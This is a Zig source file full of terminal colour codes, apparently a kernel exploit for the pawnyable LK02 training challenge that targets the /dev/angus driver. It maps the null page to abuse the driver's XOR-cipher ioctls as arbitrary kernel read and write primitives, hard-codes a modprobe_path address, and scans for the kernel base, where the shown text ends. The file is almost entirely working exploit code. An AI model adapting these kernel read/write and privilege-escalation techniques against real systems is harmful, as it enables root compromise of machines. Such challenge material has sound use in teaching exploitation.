�[1m�[37m �[0m�[1m�[37mGETDATA�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x13370004�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mENCRYPT�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x13370005�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mDECRYPT�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x13370006�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mXorCipher�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mkey�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdata�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mkeylen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdatalen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mrequest_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mptr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mzero_page�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?*�[0m�[33mallowzero�[0m�[1m�[37m �[0m�[1m�[37mXorCipher�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mmmap_null�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!*�[0m�[33mallowzero�[0m�[1m�[37m �[0m�[1m�[37mXorCipher�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mzero_page�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mret�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mrc�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mmmap�[0m�[1m�[37m(�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mheap�[0m�[1m�[37m.�[0m�[1m�[37mpage_size_min�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mREAD�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mPROT�[0m�[1m�[37m.�[0m�[1m�[37mWRITE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mMAP�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mTYPE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPRIVATE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mFIXED�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mANONYMOUS�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPOPULATE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mrc�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37mzero_page�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@ptrFromInt�[0m�[1m�[37m(�[0m�[1m�[37mrc�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mTXTBSY�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mAccessDenied�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCES�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mAccessDenied�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mPERM�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mPermissionDenied�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mAGAIN�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mLockedMemoryLimitExceeded�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mBADF�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mOVERFLOW�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNODEV�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mMemoryMappingNotSupported�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mINVAL�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33munreachable�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mMFILE�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mProcessFdQuotaExceeded�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNFILE�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mSystemFdQuotaExceeded�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNOMEM�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mOutOfMemory�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mEXIST�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mMappingAlreadyExists�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mzero_page�[0m�[1m�[37m.�[0m�[1m�[36m?�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37maaw�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mtarget_value�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m128�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m<=�[0m�[1m�[37m �[0m�[1m�[37mtarget_value�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mtarget_value�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mi�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mtarget_value�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m^=�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[37mi�[0m�[1m�[37m];�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mctx�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mmmap_null�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mctx�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mkey�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m([�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mtarget_value�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mkeylen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdata�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m([�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@ptrFromInt�[0m�[1m�[37m(�[0m�[1m�[37maddr�[0m�[1m�[37m)),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdatalen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37merr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mangus_ioctl�[0m�[1m�[37m.�[0m�[1m�[37mENCRYPT�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mrequest_t�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mptr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@ptrFromInt�[0m�[1m�[37m(�[0m�[1m�[36m1�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m �[0m�[1m�[37m}));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mAAWFail�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37maddr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mctx�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mmmap_null�[0m�[1m�[37m();�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mctx�[0m�[1m�[37m.�[0m�[1m�[36m*�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mkey�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@constCast�[0m�[1m�[37m(�[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m{�[0m�[1m�[36m0�[0m�[1m�[37m})),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mkeylen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdata�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m([�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@ptrFromInt�[0m�[1m�[37m(�[0m�[1m�[37maddr�[0m�[1m�[37m)),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdatalen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37merr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mangus_ioctl�[0m�[1m�[37m.�[0m�[1m�[37mGETDATA�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mrequest_t�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mptr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m([�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[37m@constCast�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[37m}));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mAARFail�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk02�[0m�[1m�[36m-�[0m�[1m�[37mtypes�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81e37e60�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mmain�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mopen�[0m�[1m�[37m(�[0m�[33m"/dev/angus"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mACCMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mRDWR�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[36m0o660�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m8�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mkaddr�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81000000�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mwhile�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mkaddr�[0m�[1m�[37m �[0m�[1m�[36m<�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff80000000�[0m�[1m�[36m+�[0m�[1m�[36m0x40000000�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mkaddr�[0m�[1m�[37m �[0m�[1m�[36m+=�[0m�[1m�[37m �[0m�[1m�[36m0x100000�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[37maar�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mkaddr�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mlog�[0m�[1m�[37m.�[0m�[37minfo�[0m�[1m�[37m(�[0m�[33m"Kernel base address: 0x{x}"�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37mkaddr�[0m�[1m�[37m});�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mKBaseAddressScanFailed�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
